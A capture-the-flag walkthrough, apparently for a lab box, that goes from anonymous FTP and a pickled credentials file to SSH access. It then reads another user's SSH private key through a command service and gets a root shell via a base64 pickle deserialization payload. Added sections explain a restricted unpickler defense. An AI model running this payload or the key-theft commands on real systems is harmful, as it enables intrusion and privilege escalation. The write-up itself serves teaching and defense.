Start with a full TCP port scan with service and OS detection:
nmap -sV -sT -O -p 1-65535 $VICTIM
FTP on port 21 accepts anonymous logins:
ftp $VICTIM 21
username: anonymous
A plain listing shows only test.txt, which contains nothing useful; listing with ls -lah (so dotfiles are shown) also reveals a hidden .creds file. Switch to binary mode before downloading so the file is not mangled:
ls -lah
binary
passive
get test.txt
get .creds
The .creds file is a Python pickle. Unpickling is itself code execution: the loader imports and calls whatever the data names, so only do this in a throwaway interpreter on a box you do not mind losing. Here it is the way in, so load it and print what comes out (the downloaded file is saved locally as download.dat):
import pickle

# the pickle pulled from the anonymous FTP share
with open("download.dat", "rb") as file:
    pickle_data = file.read()

# pickle.loads runs any callable embedded in the data; acceptable on a CTF
# target's file, never on input you do not control
creds = pickle.loads(pickle_data)
print(creds)
Running it with the output redirected to output.txt gives:
[('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'), ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'), ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'), ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'), ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'), ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'), ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'), ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'), ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1')]
The list is shuffled: each key is a field name followed by the index of that character in the final string. Split the entries one per line and pull out the two fields:
sed "s/), (/)\n/g" output.txt | grep ssh_user
sed "s/), (/)\n/g" output.txt | grep ssh_pass
Ordering the ssh_user characters by index gives the username gherkin, and the ssh_pass characters give the password:
p1ckl3s_@11_@r0und_th3_w0rld
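The same reassembly done programmatically, as an added example rather than code from the write-up: it takes the (key, char) pairs exactly as the unpickled output above printed them, groups them by field name, orders each field by its numeric suffix and refuses to produce a string if an index is missing or duplicated, so a truncated or tampered file is noticed instead of silently yielding a wrong password.

```python
import re
from collections import defaultdict

# The (key, char) pairs from the unpickled .creds output above.
# Each key is <field><index>; the index is the character's position.
CRED_PAIRS = [
    ('ssh_pass15', 'u'), ('ssh_user1', 'h'), ('ssh_pass25', 'r'), ('ssh_pass20', 'h'),
    ('ssh_pass7', '_'), ('ssh_user0', 'g'), ('ssh_pass26', 'l'), ('ssh_pass5', '3'),
    ('ssh_pass1', '1'), ('ssh_pass22', '_'), ('ssh_pass12', '@'), ('ssh_user2', 'e'),
    ('ssh_user5', 'i'), ('ssh_pass18', '_'), ('ssh_pass27', 'd'), ('ssh_pass3', 'k'),
    ('ssh_pass19', 't'), ('ssh_pass6', 's'), ('ssh_pass9', '1'), ('ssh_pass23', 'w'),
    ('ssh_pass21', '3'), ('ssh_pass4', 'l'), ('ssh_pass14', '0'), ('ssh_user6', 'n'),
    ('ssh_pass2', 'c'), ('ssh_pass13', 'r'), ('ssh_pass16', 'n'), ('ssh_pass8', '@'),
    ('ssh_pass17', 'd'), ('ssh_pass24', '0'), ('ssh_user3', 'r'), ('ssh_user4', 'k'),
    ('ssh_pass11', '_'), ('ssh_pass0', 'p'), ('ssh_pass10', '1'),
]

# field name (letters/underscores) followed by a decimal index
KEY_RE = re.compile(r"^(?P<field>[a-z_]+?)(?P<index>\d+)$")


def rebuild_creds(pairs):
    """Turn scattered (field+index, char) pairs into {field: string}.

    Raises ValueError on an unexpected key, a duplicate index or a gap in
    the index sequence, so a damaged file never yields a plausible-looking
    but wrong credential.
    """
    by_field = defaultdict(dict)
    for key, ch in pairs:
        m = KEY_RE.match(key)
        if not m:
            raise ValueError(f"unexpected key format: {key!r}")
        field, idx = m.group("field"), int(m.group("index"))
        if idx in by_field[field]:
            raise ValueError(f"duplicate index {idx} for {field}")
        by_field[field][idx] = ch

    result = {}
    for field, chars in by_field.items():
        expected = set(range(len(chars)))
        if set(chars) != expected:
            missing = sorted(expected - set(chars))
            raise ValueError(f"{field}: missing indices {missing}")
        result[field] = "".join(chars[i] for i in range(len(chars)))
    return result


if __name__ == "__main__":
    for field, value in rebuild_creds(CRED_PAIRS).items():
        print(f"{field}: {value}")
```

The gap check matters more than it looks: with 28 shuffled single characters, one missing entry would still produce a 27-character string that looks like a password and simply fails at the SSH prompt.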
ssh gherkin@$VICTIM
Password: p1ckl3s_@11_@r0und_th3_w0rld
There is a .pyc file in the home directory. .pyc files are compiled Python bytecode; the interpreter writes them (into __pycache__) when a module is imported, so that the next import can skip parsing, and tools such as py_compile produce them on demand. They are not source, but they still carry the whole program logic and any hard-coded secrets, and uncompyle6 (a native Python cross-version decompiler and fragment decompiler) turns them back into readable Python. It handles bytecode up to Python 3.8; for newer interpreters use decompyle3 or pycdc instead.
ls -lah
cat cmd_service.pyc
The bytecode is mostly unreadable on its own, so pull the file back to the attacking machine and decompile it:
scp gherkin@$VICTIM:/home/gherkin/cmd_service.pyc /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
sudo pip install uncompyle6
uncompyle6 cmd_service.pyc
The decompiled source has two interesting things in it: a username and password, stored as big integers and converted back with long_to_bytes, and a service listening on port 7321, which also showed up in the nmap scan. Encoding strings as integers is not protection; the two lines taken out of the file give the plaintext straight back:
from Crypto.Util.number import long_to_bytes  # pip install pycryptodome

# the two integers exactly as they appear in the decompiled cmd_service.pyc;
# the service's other imports are not needed to recover them
username = long_to_bytes(1684630636)
password = long_to_bytes(2457564920124666544827225107428488864802762356)
print(username)
print(password)
Connect to the service on 7321 with them. It presents a Cmd: prompt and runs whatever it is given, and it can read dill's home directory, so it hands over dill's SSH private key:
nc $VICTIM 7321
Username: dill
Password: n3v3r_@_d1ll_m0m3nt
Cmd: ls -lah /home/dill/.ssh
Cmd: cat /home/dill/.ssh/id_rsa
Cmd: cat /home/dill/.ssh/id_rsa > /tmp/id_rsa
Anything written to /tmp is readable by every user on the box, so copy the key out over the gherkin SSH session and delete the copy in /tmp once it is retrieved:
scp gherkin@$VICTIM:/tmp/id_rsa /root/
Password: p1ckl3s_@11_@r0und_th3_w0rld
chmod 600 id_rsa
ssh -i id_rsa dill@$VICTIM
dill is allowed to run /opt/peak_hill_farm/peak_hill_farm as root with sudo. The program reads input from the user and unpickles it:
sudo /opt/peak_hill_farm/peak_hill_farm
pickle
Unpickling attacker-controlled data as root is a straight root shell. An object whose __reduce__ returns (os.system, ('/bin/bash',)) makes the unpickler call os.system('/bin/bash') when it rebuilds the object; the pickle is base64-encoded so it can be pasted at the prompt:
import pickle
import os
import base64

class EvilPickle(object):
    # pickle calls the returned callable with the returned args when the
    # object is unpickled, so the loader runs os.system('/bin/bash') for us
    def __reduce__(self):
        return (os.system, ('/bin/bash', ))

pickle_data = pickle.dumps(EvilPickle())
payload = base64.b64encode(pickle_data)
print(payload.decode())
Run the binary again and paste the payload at the prompt; when it is unpickled, /bin/bash starts as root. The blob below is a protocol-3 pickle; a newer Python defaults to protocol 4 and prints a different but equivalent payload:
sudo /opt/peak_hill_farm/peak_hill_farm
gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4=
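What the unpickler actually does with that blob, and what would have stopped it, as an added example that is not code from the write-up or from the target. It inspects the payload above opcode by opcode without loading it, runs the same __reduce__ trick through a pickle.loads-style loader with a harmless callable in place of os.system, and shows a restricted Unpickler that refuses every global lookup, which is the fix for both peak_hill_farm and for loading an untrusted .creds file from the FTP server. That the service does base64 decode followed by pickle.loads is an assumption about the binary; the loader here is a model of it.

```python
import base64
import io
import os
import pickle
import pickletools

# The exploit blob from the write-up: a protocol-3 pickle that REDUCEs
# posix.system('/bin/bash'). It is only inspected here, never loaded.
PAGE_PAYLOAD = "gANjcG9zaXgKc3lzdGVtCnEAWAkAAAAvYmluL2Jhc2hxAYVxAlJxAy4="

# Opcodes that make the unpickler import something or call it. A pickle of
# plain data (lists, tuples, dicts, strings, numbers) never needs any of them.
CALL_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def suspicious_ops(b64: str):
    """Walk the opcodes without executing anything and report the ones that
    would import or call code, as (opcode name, argument) pairs."""
    data = base64.b64decode(b64)
    return [(op.name, arg) for op, arg, _pos in pickletools.genops(data)
            if op.name in CALL_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so only literal data can be rebuilt."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def unsafe_load(b64: str):
    """Model of what the service appears to do (assumption): base64 in,
    pickle.loads out. Never call this on PAGE_PAYLOAD; it would run bash."""
    return pickle.loads(base64.b64decode(b64))


def safe_load(b64: str):
    """Same interface, but callables cannot be reached from the data."""
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64))).load()


def loads_safely(b64: str) -> bool:
    """True if the restricted loader accepts the blob, False if it refuses."""
    try:
        safe_load(b64)
        return True
    except pickle.UnpicklingError:
        return False


class Probe:
    """Same __reduce__ trick as EvilPickle, with a harmless callable (a path
    join) so the example can be run; swapping in os.system gives the page's
    payload."""
    def __reduce__(self):
        return (os.path.join, ("/tmp", "unpickle-ran-code"))


def probe_payload() -> str:
    return base64.b64encode(pickle.dumps(Probe())).decode()


def data_payload(obj) -> str:
    """Base64 pickle of ordinary data, the only thing a loader should accept."""
    return base64.b64encode(pickle.dumps(obj)).decode()


if __name__ == "__main__":
    print(suspicious_ops(PAGE_PAYLOAD))      # GLOBAL posix system, REDUCE
    print(unsafe_load(probe_payload()))      # the callable ran
    print(loads_safely(probe_payload()))     # False: refused
    print(safe_load(data_payload([("ssh_user0", "g")])))
```

The opcode scan is the cheap triage check: pickletools.genops only parses, so it is safe to run on a blob you found on a host, and anything from CALL_OPCODES in data that is supposed to be a credential list is a red flag. The restricted Unpickler is the actual fix; a real service that needs to rebuild its own classes would whitelist exactly those in find_class rather than refusing everything.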